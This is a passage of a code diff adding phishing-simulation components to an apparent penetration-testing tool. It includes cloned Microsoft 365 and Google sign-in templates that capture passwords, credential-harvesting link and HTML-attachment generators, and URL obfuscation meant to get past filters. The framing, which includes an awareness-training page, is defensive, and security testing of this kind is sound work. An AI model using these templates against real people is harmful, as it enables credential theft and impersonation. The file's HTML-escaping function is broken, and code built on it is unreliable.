+          <input type="password" id="password" name="password" placeholder="Password" required>
+          <p class="hint"><a href="#">Forgot password?</a></p>
+          <button type="submit">Sign in</button>
+        </div>
+      </form>
+    </div>
+  </div>
+  <script>
+    function showPassword() {
+      var email = document.getElementById('email').value;
+      if (email) {
+        document.getElementById('email-step').style.display = 'none';
+        document.getElementById('password-step').style.display = 'block';
+        document.getElementById('user-email').textContent = email;
+        document.getElementById('password').focus();
+      }
+    }
+    function showEmail() {
+      document.getElementById('password-step').style.display = 'none';
+      document.getElementById('email-step').style.display = 'block';
+    }
+  </script>
+</body>
+</html>`,
+    css: `
+* { box-sizing: border-box; margin: 0; padding: 0; }
+body { font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background: #f2f2f2; min-height: 100vh; display: flex; align-items: center; justify-content: center; }
+.container { width: 100%; max-width: 440px; padding: 20px; }
+.login-box { background: white; padding: 44px; box-shadow: 0 2px 6px rgba(0,0,0,0.2); }
+.logo { margin-bottom: 16px; }
+h1 { font-size: 24px; font-weight: 600; margin-bottom: 24px; color: #1b1b1b; }
+.form-group { margin-bottom: 16px; }
+input[type="email"], input[type="password"] { width: 100%; padding: 10px 0; border: none; border-bottom: 1px solid #666; font-size: 15px; outline: none; }
+input:focus { border-bottom-color: #0067b8; }
+button { width: 100%; padding: 10px; background: #0067b8; color: white; border: none; font-size: 15px; cursor: pointer; margin-top: 24px; }
+button:hover { background: #005a9e; }
+.hint { margin-top: 16px; font-size: 13px; color: #666; }
+.hint a { color: #0067b8; text-decoration: none; }
+.user-display { margin-bottom: 24px; display: flex; align-items: center; }
+.back { cursor: pointer; margin-right: 12px; font-size: 18px; }
+label { display: block; margin-bottom: 12px; font-size: 15px; color: #1b1b1b; }`,
+    fields: [
+      { name: "email", type: "email", label: "Email", placeholder: "Email, phone, or Skype", required: true, capture: true },
+      { name: "password", type: "password", label: "Password", placeholder: "Password", required: true, capture: true },
+    ],
+  }
+
+  /**
+   * Google login page template.
+   */
+  export const GOOGLE_LOGIN: LandingPageTemplate = {
+    id: "google-login",
+    name: "Google Sign-In",
+    description: "Google style sign-in page",
+    category: "login",
+    html: `
+<!DOCTYPE html>
+<html>
+<head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>Sign in - Google Accounts</title>
+  <style>{{CSS}}</style>
+</head>
+<body>
+  <div class="container">
+    <div class="login-box">
+      <div class="logo">
+        <svg viewBox="0 0 75 24" width="75" height="24"><g><path fill="#4285F4" d="M0 12.5c0 3.42 2.69 6.18 6.01 6.18 1.8 0 3.1-.73 4.05-1.9l-1.66-1.6c-.55.72-1.44 1.27-2.39 1.27-1.99 0-3.55-1.64-3.55-3.95s1.55-3.95 3.55-3.95c1.25 0 1.96.5 2.42 1.02l1.68-1.68C8.99 6.77 7.59 6.32 6.01 6.32 2.69 6.32 0 9.08 0 12.5z"/><path fill="#EA4335" d="M19.82 12.5c0-3.42-2.48-6.18-5.51-6.18s-5.51 2.76-5.51 6.18c0 3.42 2.48 6.18 5.51 6.18s5.51-2.76 5.51-6.18zm-2.44 0c0 2.23-1.35 3.95-3.07 3.95S11.24 14.73 11.24 12.5s1.35-3.95 3.07-3.95 3.07 1.72 3.07 3.95z"/><path fill="#FBBC05" d="M31.12 12.5c0-3.42-2.48-6.18-5.51-6.18s-5.51 2.76-5.51 6.18c0 3.42 2.48 6.18 5.51 6.18s5.51-2.76 5.51-6.18zm-2.44 0c0 2.23-1.35 3.95-3.07 3.95s-3.07-1.72-3.07-3.95 1.35-3.95 3.07-3.95 3.07 1.72 3.07 3.95z"/><path fill="#4285F4" d="M42.34 6.68h-2.2v.75h-.05c-.59-.71-1.48-1.11-2.68-1.11-2.91 0-5.16 2.76-5.16 6.18s2.25 6.18 5.16 6.18c1.19 0 2.09-.4 2.68-1.11h.05v.71c0 2-1.02 3.07-2.73 3.07-1.42 0-2.23-.96-2.54-1.73l-2.13.88c.6 1.26 2.14 2.76 4.67 2.76 2.83 0 5.16-1.66 5.16-5.71v-10.9h-.23v.03zm-4.59 9.77c-1.72 0-3.07-1.72-3.07-3.95s1.35-3.95 3.07-3.95 2.93 1.72 2.93 3.95-1.21 3.95-2.93 3.95z"/><path fill="#34A853" d="M46.38.92h2.44v17.76h-2.44z"/><path fill="#EA4335" d="M57.62 16.45c-1.37 0-2.36-.62-2.99-1.83l8.26-3.42-.28-.71c-.52-1.4-2.1-3.97-5.33-3.97-3.2 0-5.87 2.52-5.87 6.18 0 3.47 2.64 6.18 6.17 6.18 2.85 0 4.5-1.75 5.19-2.77l-2.13-1.42c-.69 1.03-1.65 1.76-3.02 1.76zm-.19-7.6c1.1 0 2.03.55 2.33 1.33l-5.57 2.3c0-2.53 1.66-3.63 3.24-3.63z"/></g></svg>
+      </div>
+      <h1>Sign in</h1>
+      <p class="subtitle">Use your Google Account</p>
+      <form method="POST" action="{{SUBMIT_URL}}">
+        <input type="hidden" name="campaign_id" value="{{CAMPAIGN_ID}}">
+        <input type="hidden" name="target_id" value="{{TARGET_ID}}">
+        <div class="form-group">
+          <input type="email" id="email" name="email" placeholder="Email or phone" required>
+        </div>
+        <div class="form-group">
+          <input type="password" id="password" name="password" placeholder="Enter your password" required>
+        </div>
+        <p class="hint"><a href="#">Forgot email?</a></p>
+        <p class="guest-text">Not your computer? Use Guest mode to sign in privately. <a href="#">Learn more</a></p>
+        <div class="buttons">
+          <a href="#" class="create-account">Create account</a>
+          <button type="submit">Next</button>
+        </div>
+      </form>
+    </div>
+  </div>
+</body>
+</html>`,
+    css: `
+* { box-sizing: border-box; margin: 0; padding: 0; }
+body { font-family: 'Google Sans', Roboto, Arial, sans-serif; background: #fff; min-height: 100vh; display: flex; align-items: center; justify-content: center; }
+.container { width: 100%; max-width: 450px; padding: 20px; }
+.login-box { border: 1px solid #dadce0; border-radius: 8px; padding: 48px 40px 36px; }
+.logo { text-align: center; margin-bottom: 16px; }
+h1 { font-size: 24px; font-weight: 400; text-align: center; margin-bottom: 8px; }
+.subtitle { text-align: center; color: #202124; font-size: 16px; margin-bottom: 32px; }
+.form-group { margin-bottom: 24px; }
+input { width: 100%; padding: 13px 15px; border: 1px solid #dadce0; border-radius: 4px; font-size: 16px; outline: none; }
+input:focus { border-color: #1a73e8; box-shadow: 0 0 0 1px #1a73e8; }
+.hint { font-size: 14px; margin-bottom: 24px; }
+.hint a { color: #1a73e8; text-decoration: none; font-weight: 500; }
+.guest-text { font-size: 14px; color: #5f6368; line-height: 1.5; margin-bottom: 32px; }
+.guest-text a { color: #1a73e8; text-decoration: none; }
+.buttons { display: flex; justify-content: space-between; align-items: center; }
+.create-account { color: #1a73e8; text-decoration: none; font-weight: 500; font-size: 14px; }
+button { padding: 10px 24px; background: #1a73e8; color: white; border: none; border-radius: 4px; font-size: 14px; font-weight: 500; cursor: pointer; }
+button:hover { background: #1557b0; box-shadow: 0 1px 2px rgba(0,0,0,0.3); }`,
+    fields: [
+      { name: "email", type: "email", label: "Email or phone", placeholder: "Email or phone", required: true, capture: true },
+      { name: "password", type: "password", label: "Password", placeholder: "Enter your password", required: true, capture: true },
+    ],
+  }
+
+  /**
+   * Document download page template.
+   */
+  export const DOCUMENT_DOWNLOAD: LandingPageTemplate = {
+    id: "document-download",
+    name: "Document Download",
+    description: "Shared document requiring sign-in to download",
+    category: "document",
+    html: `
+<!DOCTYPE html>
+<html>
+<head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>Shared Document</title>
+  <style>{{CSS}}</style>
+</head>
+<body>
+  <div class="container">
+    <div class="document-box">
+      <div class="icon">📄</div>
+      <h1>{{DOCUMENT_NAME}}</h1>
+      <p class="shared-by">Shared by {{SENDER_NAME}}</p>
+      <div class="divider"></div>
+      <p class="verify-text">Please verify your identity to access this document</p>
+      <form method="POST" action="{{SUBMIT_URL}}">
+        <input type="hidden" name="campaign_id" value="{{CAMPAIGN_ID}}">
+        <input type="hidden" name="target_id" value="{{TARGET_ID}}">
+        <div class="form-group">
+          <input type="email" id="email" name="email" placeholder="Email address" required>
+        </div>
+        <div class="form-group">
+          <input type="password" id="password" name="password" placeholder="Password" required>
+        </div>
+        <button type="submit">Verify & Download</button>
+      </form>
+      <p class="footer-text">By continuing, you agree to our Terms of Service</p>
+    </div>
+  </div>
+</body>
+</html>`,
+    css: `
+* { box-sizing: border-box; margin: 0; padding: 0; }
+body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); min-height: 100vh; display: flex; align-items: center; justify-content: center; }
+.container { width: 100%; max-width: 400px; padding: 20px; }
+.document-box { background: white; padding: 40px; border-radius: 12px; box-shadow: 0 10px 40px rgba(0,0,0,0.2); text-align: center; }
+.icon { font-size: 48px; margin-bottom: 16px; }
+h1 { font-size: 18px; color: #333; margin-bottom: 8px; word-break: break-word; }
+.shared-by { color: #666; font-size: 14px; margin-bottom: 24px; }
+.divider { height: 1px; background: #eee; margin: 24px 0; }
+.verify-text { color: #333; margin-bottom: 24px; font-size: 14px; }
+.form-group { margin-bottom: 16px; }
+input { width: 100%; padding: 14px 16px; border: 2px solid #e0e0e0; border-radius: 8px; font-size: 16px; outline: none; transition: border-color 0.2s; }
+input:focus { border-color: #667eea; }
+button { width: 100%; padding: 14px; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; border: none; border-radius: 8px; font-size: 16px; font-weight: 600; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; }
+button:hover { transform: translateY(-1px); box-shadow: 0 4px 12px rgba(102, 126, 234, 0.4); }
+.footer-text { margin-top: 20px; font-size: 12px; color: #999; }`,
+    fields: [
+      { name: "email", type: "email", label: "Email address", placeholder: "Email address", required: true, capture: true },
+      { name: "password", type: "password", label: "Password", placeholder: "Password", required: true, capture: true },
+    ],
+  }
+
+  /**
+   * All built-in templates.
+   */
+  export const ALL_TEMPLATES: LandingPageTemplate[] = [
+    GENERIC_LOGIN,
+    MICROSOFT_365,
+    GOOGLE_LOGIN,
+    DOCUMENT_DOWNLOAD,
+  ]
+
+  // ========== Page Generation ==========
+
+  /**
+   * Page generation options.
+   */
+  export interface GeneratePageOptions {
+    template: string | LandingPageTemplate
+    campaignId: string
+    targetId: string
+    submitUrl: string
+    customizations?: {
+      documentName?: string
+      senderName?: string
+      logoUrl?: string
+      companyName?: string
+      redirectUrl?: string
+    }
+  }
+
+  /**
+   * Generate a landing page HTML.
+   */
+  export function generatePage(options: GeneratePageOptions): string {
+    const template =
+      typeof options.template === "string"
+        ? getTemplate(options.template)
+        : options.template
+
+    if (!template) {
+      throw new Error(`Template not found: ${options.template}`)
+    }
+
+    let html = template.html
+      .replace(/\{\{CSS\}\}/g, template.css)
+      .replace(/\{\{SUBMIT_URL\}\}/g, options.submitUrl)
+      .replace(/\{\{CAMPAIGN_ID\}\}/g, options.campaignId)
+      .replace(/\{\{TARGET_ID\}\}/g, options.targetId)
+
+    if (options.customizations) {
+      const { documentName, senderName, logoUrl, companyName, redirectUrl } =
+        options.customizations
+
+      if (documentName) {
+        html = html.replace(/\{\{DOCUMENT_NAME\}\}/g, documentName)
+      }
+      if (senderName) {
+        html = html.replace(/\{\{SENDER_NAME\}\}/g, senderName)
+      }
+      if (logoUrl) {
+        html = html.replace(/\{\{LOGO_URL\}\}/g, logoUrl)
+      }
+      if (companyName) {
+        html = html.replace(/\{\{COMPANY\}\}/g, companyName)
+      }
+      if (redirectUrl) {
+        html = html.replace(/\{\{REDIRECT_URL\}\}/g, redirectUrl)
+      }
+    }
+
+    return html
+  }
+
+  /**
+   * Get template by ID.
+   */
+  export function getTemplate(templateId: string): LandingPageTemplate | undefined {
+    return ALL_TEMPLATES.find((t) => t.id === templateId)
+  }
+
+  /**
+   * Get all templates.
+   */
+  export function getTemplates(): LandingPageTemplate[] {
+    return ALL_TEMPLATES
+  }
+
+  /**
+   * Get templates by category.
+   */
+  export function getTemplatesByCategory(category: string): LandingPageTemplate[] {
+    return ALL_TEMPLATES.filter((t) => t.category === category)
+  }
+
+  // ========== Landing Page Model ==========
+
+  /**
+   * Create landing page record.
+   */
+  export function createLandingPage(
+    template: LandingPageTemplate,
+    options: {
+      name?: string
+      url?: string
+      redirectUrl?: string
+    }
+  ): SocEngTypes.LandingPage {
+    return {
+      id: SocEngStorage.createPageId(),
+      name: options.name || template.name,
+      url: options.url || "",
+      templateId: template.id,
+      html: template.html,
+      captureCredentials: template.fields.some((f) => f.capture),
+      captureFields: template.fields.filter((f) => f.capture).map((f) => f.name),
+      redirectUrl: options.redirectUrl,
+      createdAt: Date.now(),
+    }
+  }
+
+  // ========== Redirect Pages ==========
+
+  /**
+   * Generate post-submission redirect page.
+   */
+  export function generateRedirectPage(
+    redirectUrl: string,
+    message?: string
+  ): string {
+    return `
+<!DOCTYPE html>
+<html>
+<head>
+  <meta charset="utf-8">
+  <meta http-equiv="refresh" content="3;url=${redirectUrl}">
+  <title>Redirecting...</title>
+  <style>
+    body { font-family: -apple-system, sans-serif; display: flex; align-items: center; justify-content: center; min-height: 100vh; background: #f5f5f5; }
+    .box { text-align: center; padding: 40px; background: white; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
+    .spinner { width: 40px; height: 40px; border: 4px solid #e0e0e0; border-top-color: #4285f4; border-radius: 50%; animation: spin 1s linear infinite; margin: 0 auto 20px; }
+    @keyframes spin { to { transform: rotate(360deg); } }
+  </style>
+</head>
+<body>
+  <div class="box">
+    <div class="spinner"></div>
+    <p>${message || "Please wait, redirecting..."}</p>
+  </div>
+</body>
+</html>`
+  }
+
+  /**
+   * Generate error page.
+   */
+  export function generateErrorPage(message?: string): string {
+    return `
+<!DOCTYPE html>
+<html>
+<head>
+  <meta charset="utf-8">
+  <title>Error</title>
+  <style>
+    body { font-family: -apple-system, sans-serif; display: flex; align-items: center; justify-content: center; min-height: 100vh; background: #f5f5f5; }
+    .box { text-align: center; padding: 40px; background: white; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
+    .icon { font-size: 48px; margin-bottom: 16px; }
+    h1 { color: #d32f2f; margin-bottom: 8px; }
+    p { color: #666; }
+  </style>
+</head>
+<body>
+  <div class="box">
+    <div class="icon">⚠️</div>
+    <h1>Error</h1>
+    <p>${message || "An error occurred. Please try again."}</p>
+  </div>
+</body>
+</html>`
+  }
+
+  /**
+   * Generate awareness training redirect.
+   */
+  export function generateAwarenessPage(options?: {
+    title?: string
+    message?: string
+    trainingUrl?: string
+  }): string {
+    const title = options?.title || "Security Awareness Training"
+    const message =
+      options?.message ||
+      "You clicked on a simulated phishing link as part of a security awareness exercise."
+    const trainingUrl = options?.trainingUrl || "#"
+
+    return `
+<!DOCTYPE html>
+<html>
+<head>
+  <meta charset="utf-8">
+  <title>${title}</title>
+  <style>
+    body { font-family: -apple-system, sans-serif; display: flex; align-items: center; justify-content: center; min-height: 100vh; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); }
+    .box { text-align: center; padding: 50px; background: white; border-radius: 12px; box-shadow: 0 10px 40px rgba(0,0,0,0.2); max-width: 500px; margin: 20px; }
+    .icon { font-size: 64px; margin-bottom: 24px; }
+    h1 { color: #333; margin-bottom: 16px; }
+    p { color: #666; line-height: 1.6; margin-bottom: 24px; }
+    .tips { text-align: left; background: #f5f5f5; padding: 20px; border-radius: 8px; margin-bottom: 24px; }
+    .tips h3 { color: #333; margin-bottom: 12px; }
+    .tips ul { color: #666; padding-left: 20px; }
+    .tips li { margin-bottom: 8px; }
+    .btn { display: inline-block; padding: 14px 28px; background: #4caf50; color: white; text-decoration: none; border-radius: 8px; font-weight: 600; }
+    .btn:hover { background: #43a047; }
+  </style>
+</head>
+<body>
+  <div class="box">
+    <div class="icon">🎓</div>
+    <h1>${title}</h1>
+    <p>${message}</p>
+    <div class="tips">
+      <h3>How to Spot Phishing:</h3>
+      <ul>
+        <li>Check the sender's email address carefully</li>
+        <li>Hover over links before clicking</li>
+        <li>Be suspicious of urgent requests</li>
+        <li>When in doubt, contact IT directly</li>
+      </ul>
+    </div>
+    <a href="${trainingUrl}" class="btn">Take Security Training</a>
+  </div>
+</body>
+</html>`
+  }
+
+  // ========== Formatting ==========
+
+  /**
+   * Format template list for display.
+   */
+  export function formatTemplateList(): string {
+    const lines: string[] = []
+
+    lines.push("Landing Page Templates")
+    lines.push("=".repeat(50))
+
+    const categories = [...new Set(ALL_TEMPLATES.map((t) => t.category))]
+
+    for (const category of categories) {
+      lines.push("")
+      lines.push(`📁 ${category.toUpperCase()}`)
+
+      const templates = getTemplatesByCategory(category)
+      for (const template of templates) {
+        lines.push(`   • ${template.id}: ${template.name}`)
+        lines.push(`     ${template.description}`)
+        lines.push(`     Fields: ${template.fields.map((f) => f.name).join(", ")}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/phishing/payloads.ts b/packages/opencode/src/pentest/soceng/phishing/payloads.ts
new file mode 100644
index 00000000000..d77845d2cba
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/phishing/payloads.ts
@@ -0,0 +1,500 @@
+/**
+ * @fileoverview Phishing Payload Generation
+ *
+ * Generation of phishing payloads for email attachments and links.
+ *
+ * @module pentest/soceng/phishing/payloads
+ */
+
+import * as crypto from "crypto"
+import { SocEngTypes } from "../types"
+import { SocEngStorage } from "../storage"
+
+/**
+ * Phishing payloads namespace.
+ */
+export namespace PhishingPayloads {
+  // ========== Payload Types ==========
+
+  /**
+   * Phishing payload types.
+   */
+  export type PayloadType =
+    | "tracking-link"
+    | "credential-link"
+    | "html-attachment"
+    | "qr-code"
+    | "callback-link"
+
+  /**
+   * Phishing payload definition.
+   */
+  export interface PhishingPayload {
+    id: string
+    type: PayloadType
+    name: string
+    description: string
+    content: string
+    mimeType?: string
+    filename?: string
+    trackingEnabled: boolean
+    metadata: Record<string, string>
+    createdAt: number
+  }
+
+  // ========== Link Payloads ==========
+
+  /**
+   * Generate a tracking link.
+   */
+  export function generateTrackingLink(options: {
+    baseUrl: string
+    campaignId: string
+    targetId: string
+    trackingPath?: string
+  }): PhishingPayload {
+    const token = generateToken(options.campaignId, options.targetId)
+    const path = options.trackingPath || "/t"
+    const url = `${options.baseUrl}${path}?t=${token}`
+
+    return {
+      id: SocEngStorage.createPayloadId(),
+      type: "tracking-link",
+      name: "Tracking Link",
+      description: "Link that tracks when clicked",
+      content: url,
+      trackingEnabled: true,
+      metadata: {
+        campaignId: options.campaignId,
+        targetId: options.targetId,
+        token,
+      },
+      createdAt: Date.now(),
+    }
+  }
+
+  /**
+   * Generate a credential harvesting link.
+   */
+  export function generateCredentialLink(options: {
+    baseUrl: string
+    campaignId: string
+    targetId: string
+    landingPageId?: string
+  }): PhishingPayload {
+    const token = generateToken(options.campaignId, options.targetId)
+    const url = `${options.baseUrl}/l?t=${token}${options.landingPageId ? `&p=${options.landingPageId}` : ""}`
+
+    return {
+      id: SocEngStorage.createPayloadId(),
+      type: "credential-link",
+      name: "Credential Harvesting Link",
+      description: "Link to credential harvesting landing page",
+      content: url,
+      trackingEnabled: true,
+      metadata: {
+        campaignId: options.campaignId,
+        targetId: options.targetId,
+        landingPageId: options.landingPageId || "",
+        token,
+      },
+      createdAt: Date.now(),
+    }
+  }
+
+  /**
+   * Generate a callback/vishing link.
+   */
+  export function generateCallbackLink(options: {
+    phoneNumber: string
+    message?: string
+    trackingUrl?: string
+  }): PhishingPayload {
+    const telUrl = `tel:${options.phoneNumber.replace(/\D/g, "")}`
+
+    return {
+      id: SocEngStorage.createPayloadId(),
+      type: "callback-link",
+      name: "Callback Link",
+      description: "Link to initiate phone callback",
+      content: telUrl,
+      trackingEnabled: !!options.trackingUrl,
+      metadata: {
+        phoneNumber: options.phoneNumber,
+        message: options.message || "",
+        trackingUrl: options.trackingUrl || "",
+      },
+      createdAt: Date.now(),
+    }
+  }
+
+  // ========== HTML Attachments ==========
+
+  /**
+   * Generate HTML file attachment.
+   */
+  export function generateHtmlAttachment(options: {
+    filename: string
+    title: string
+    redirectUrl: string
+    campaignId: string
+    targetId: string
+    message?: string
+  }): PhishingPayload {
+    const token = generateToken(options.campaignId, options.targetId)
+    const trackingPixel = `<img src="${options.redirectUrl}?t=${token}&a=1" width="1" height="1" style="display:none">`
+
+    const html = `<!DOCTYPE html>
+<html>
+<head>
+  <meta charset="utf-8">
+  <title>${escapeHtml(options.title)}</title>
+  <style>
+    body { font-family: Arial, sans-serif; display: flex; align-items: center; justify-content: center; min-height: 100vh; background: #f5f5f5; margin: 0; }
+    .box { text-align: center; padding: 40px; background: white; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
+    .spinner { width: 40px; height: 40px; border: 4px solid #e0e0e0; border-top-color: #4285f4; border-radius: 50%; animation: spin 1s linear infinite; margin: 0 auto 20px; }
+    @keyframes spin { to { transform: rotate(360deg); } }
+  </style>
+  <script>
+    window.onload = function() {
+      setTimeout(function() {
+        window.location.href = "${escapeHtml(options.redirectUrl)}?t=${token}";
+      }, 2000);
+    };
+  </script>
+</head>
+<body>
+  <div class="box">
+    <div class="spinner"></div>
+    <p>${escapeHtml(options.message || "Loading document, please wait...")}</p>
+  </div>
+  ${trackingPixel}
+</body>
+</html>`
+
+    return {
+      id: SocEngStorage.createPayloadId(),
+      type: "html-attachment",
+      name: options.filename,
+      description: "HTML file attachment with redirect",
+      content: html,
+      mimeType: "text/html",
+      filename: options.filename.endsWith(".html") ? options.filename : `${options.filename}.html`,
+      trackingEnabled: true,
+      metadata: {
+        campaignId: options.campaignId,
+        targetId: options.targetId,
+        redirectUrl: options.redirectUrl,
+        token,
+      },
+      createdAt: Date.now(),
+    }
+  }
+
+  /**
+   * Generate HTML attachment that looks like a document viewer.
+   */
+  export function generateDocumentViewerAttachment(options: {
+    filename: string
+    documentName: string
+    previewImageUrl?: string
+    redirectUrl: string
+    campaignId: string
+    targetId: string
+  }): PhishingPayload {
+    const token = generateToken(options.campaignId, options.targetId)
+
+    const html = `<!DOCTYPE html>
+<html>
+<head>
+  <meta charset="utf-8">
+  <title>${escapeHtml(options.documentName)} - Document Viewer</title>
+  <style>
+    * { box-sizing: border-box; margin: 0; padding: 0; }
+    body { font-family: 'Segoe UI', Arial, sans-serif; background: #1a1a2e; min-height: 100vh; color: white; }
+    .header { background: #16213e; padding: 15px 20px; display: flex; align-items: center; justify-content: space-between; }
+    .logo { font-size: 18px; font-weight: 600; }
+    .doc-name { color: #a0a0a0; font-size: 14px; }
+    .container { display: flex; align-items: center; justify-content: center; min-height: calc(100vh - 60px); padding: 40px; }
+    .preview-box { background: #16213e; border-radius: 12px; padding: 40px; text-align: center; max-width: 500px; }
+    .icon { font-size: 72px; margin-bottom: 20px; }
+    h2 { margin-bottom: 12px; }
+    p { color: #a0a0a0; margin-bottom: 30px; line-height: 1.5; }
+    .btn { display: inline-block; padding: 14px 40px; background: #4285f4; color: white; text-decoration: none; border-radius: 8px; font-weight: 600; transition: background 0.2s; }
+    .btn:hover { background: #357abd; }
+    .footer { color: #666; font-size: 12px; margin-top: 30px; }
+  </style>
+</head>
+<body>
+  <div class="header">
+    <span class="logo">📄 Document Viewer</span>
+    <span class="doc-name">${escapeHtml(options.documentName)}</span>
+  </div>
+  <div class="container">
+    <div class="preview-box">
+      <div class="icon">📋</div>
+      <h2>${escapeHtml(options.documentName)}</h2>
+      <p>This document requires verification to view. Click below to verify your identity and access the document.</p>
+      <a href="${escapeHtml(options.redirectUrl)}?t=${token}" class="btn">Verify & View Document</a>
+      <p class="footer">Secured by Enterprise Document Protection</p>
+    </div>
+  </div>
+  <img src="${escapeHtml(options.redirectUrl)}?t=${token}&a=1" width="1" height="1" style="display:none">
+</body>
+</html>`
+
+    return {
+      id: SocEngStorage.createPayloadId(),
+      type: "html-attachment",
+      name: options.filename,
+      description: "HTML document viewer attachment",
+      content: html,
+      mimeType: "text/html",
+      filename: options.filename.endsWith(".html") ? options.filename : `${options.filename}.html`,
+      trackingEnabled: true,
+      metadata: {
+        campaignId: options.campaignId,
+        targetId: options.targetId,
+        documentName: options.documentName,
+        redirectUrl: options.redirectUrl,
+        token,
+      },
+      createdAt: Date.now(),
+    }
+  }
+
+  // ========== QR Code Payloads ==========
+
+  /**
+   * QR code generation options.
+   */
+  export interface QRCodeOptions {
+    url: string
+    size?: number
+    errorCorrection?: "L" | "M" | "Q" | "H"
+  }
+
+  /**
+   * Generate QR code payload (returns SVG).
+   */
+  export function generateQRCode(options: {
+    targetUrl: string
+    campaignId: string
+    targetId: string
+    size?: number
+  }): PhishingPayload {
+    const token = generateToken(options.campaignId, options.targetId)
+    const trackedUrl = `${options.targetUrl}?t=${token}`
+
+    // Generate simple QR code SVG (simplified - real implementation would use proper QR library)
+    const qrSvg = generateSimpleQRSvg(trackedUrl, options.size || 200)
+
+    return {
+      id: SocEngStorage.createPayloadId(),
+      type: "qr-code",
+      name: "QR Code",
+      description: "QR code with tracking URL",
+      content: qrSvg,
+      mimeType: "image/svg+xml",
+      trackingEnabled: true,
+      metadata: {
+        campaignId: options.campaignId,
+        targetId: options.targetId,
+        targetUrl: trackedUrl,
+        token,
+      },
+      createdAt: Date.now(),
+    }
+  }
+
+  /**
+   * Generate simple QR code SVG placeholder.
+   * Note: Real implementation should use a proper QR code library.
+   */
+  function generateSimpleQRSvg(data: string, size: number): string {
+    // This is a placeholder - real QR codes need proper encoding
+    const hash = crypto.createHash("md5").update(data).digest("hex")
+
+    return `<svg xmlns="http://www.w3.org/2000/svg" width="${size}" height="${size}" viewBox="0 0 100 100">
+  <rect width="100" height="100" fill="white"/>
+  <text x="50" y="50" text-anchor="middle" font-size="8" fill="#333">QR: ${hash.substring(0, 8)}</text>
+  <text x="50" y="65" text-anchor="middle" font-size="6" fill="#666">(Use qrencode library)</text>
+</svg>`
+  }
+
+  // ========== URL Obfuscation ==========
+
+  /**
+   * Obfuscate URL to bypass filters.
+   */
+  export function obfuscateUrl(
+    url: string,
+    technique: "unicode" | "ip" | "shortener" | "redirect"
+  ): string {
+    switch (technique) {
+      case "unicode":
+        return unicodeObfuscate(url)
+      case "ip":
+        return ipObfuscate(url)
+      case "shortener":
+        // Would integrate with URL shortening services
+        return url
+      case "redirect":
+        return redirectObfuscate(url)
+      default:
+        return url
+    }
+  }
+
+  /**
+   * Unicode/punycode obfuscation.
+   */
+  function unicodeObfuscate(url: string): string {
+    const replacements: Record<string, string> = {
+      a: "а", // Cyrillic
+      e: "е",
+      o: "о",
+      p: "р",
+      c: "с",
+      x: "х",
+    }
+
+    let obfuscated = url
+    for (const [ascii, unicode] of Object.entries(replacements)) {
+      obfuscated = obfuscated.replace(new RegExp(ascii, "g"), unicode)
+    }
+
+    return obfuscated
+  }
+
+  /**
+   * IP address obfuscation.
+   */
+  function ipObfuscate(url: string): string {
+    // Extract hostname and convert to different IP representations
+    try {
+      const urlObj = new URL(url)
+      // This is simplified - real implementation would resolve and convert IP
+      return url.replace(urlObj.hostname, `@${urlObj.hostname}`)
+    } catch {
+      return url
+    }
+  }
+
+  /**
+   * Redirect chain obfuscation.
+   */
+  function redirectObfuscate(url: string): string {
+    // Common open redirects (for testing purposes only)
+    const encodedUrl = encodeURIComponent(url)
+    return `https://www.google.com/url?q=${encodedUrl}`
+  }
+
+  // ========== Link Preview Spoofing ==========
+
+  /**
+   * Generate link preview metadata.
+   */
+  export function generateLinkPreview(options: {
+    title: string
+    description: string
+    imageUrl?: string
+    siteName?: string
+    url: string
+  }): string {
+    return `
+<meta property="og:title" content="${escapeHtml(options.title)}">
+<meta property="og:description" content="${escapeHtml(options.description)}">
+<meta property="og:url" content="${escapeHtml(options.url)}">
+${options.imageUrl ? `<meta property="og:image" content="${escapeHtml(options.imageUrl)}">` : ""}
+${options.siteName ? `<meta property="og:site_name" content="${escapeHtml(options.siteName)}">` : ""}
+<meta property="og:type" content="website">
+<meta name="twitter:card" content="summary_large_image">
+<meta name="twitter:title" content="${escapeHtml(options.title)}">
+<meta name="twitter:description" content="${escapeHtml(options.description)}">
+${options.imageUrl ? `<meta name="twitter:image" content="${escapeHtml(options.imageUrl)}">` : ""}`
+  }
+
+  // ========== Utilities ==========
+
+  /**
+   * Generate tracking token.
+   */
+  function generateToken(campaignId: string, targetId: string): string {
+    const payload = `${campaignId}:${targetId}:${Date.now()}`
+    return Buffer.from(payload).toString("base64url")
+  }
+
+  /**
+   * Escape HTML special characters.
+   */
+  function escapeHtml(str: string): string {
+    return str
+      .replace(/&/g, "&")
+      .replace(/</g, "<")
+      .replace(/>/g, ">")
+      .replace(/"/g, """)
+      .replace(/'/g, "'")
+  }
+
+  // ========== Payload Validation ==========
+
+  /**
+   * Validate payload for delivery.
+   */
+  export function validatePayload(payload: PhishingPayload): {
+    valid: boolean
+    errors: string[]
+    warnings: string[]
+  } {
+    const errors: string[] = []
+    const warnings: string[] = []
+
+    if (!payload.content) {
+      errors.push("Payload content is empty")
+    }
+
+    if (payload.type === "html-attachment" && !payload.filename) {
+      errors.push("HTML attachment requires filename")
+    }
+
+    if (payload.type === "credential-link" && !payload.metadata.landingPageId) {
+      warnings.push("Credential link has no landing page configured")
+    }
+
+    if (!payload.trackingEnabled) {
+      warnings.push("Tracking is disabled for this payload")
+    }
+
+    return {
+      valid: errors.length === 0,
+      errors,
+      warnings,
+    }
+  }
+
+  // ========== Formatting ==========
+
+  /**
+   * Format payload list for display.
+   */
+  export function formatPayloadList(payloads: PhishingPayload[]): string {
+    const lines: string[] = []
+
+    lines.push("Phishing Payloads")
+    lines.push("=".repeat(40))
+
+    for (const payload of payloads) {
+      lines.push("")
+      lines.push(`ID: ${payload.id}`)
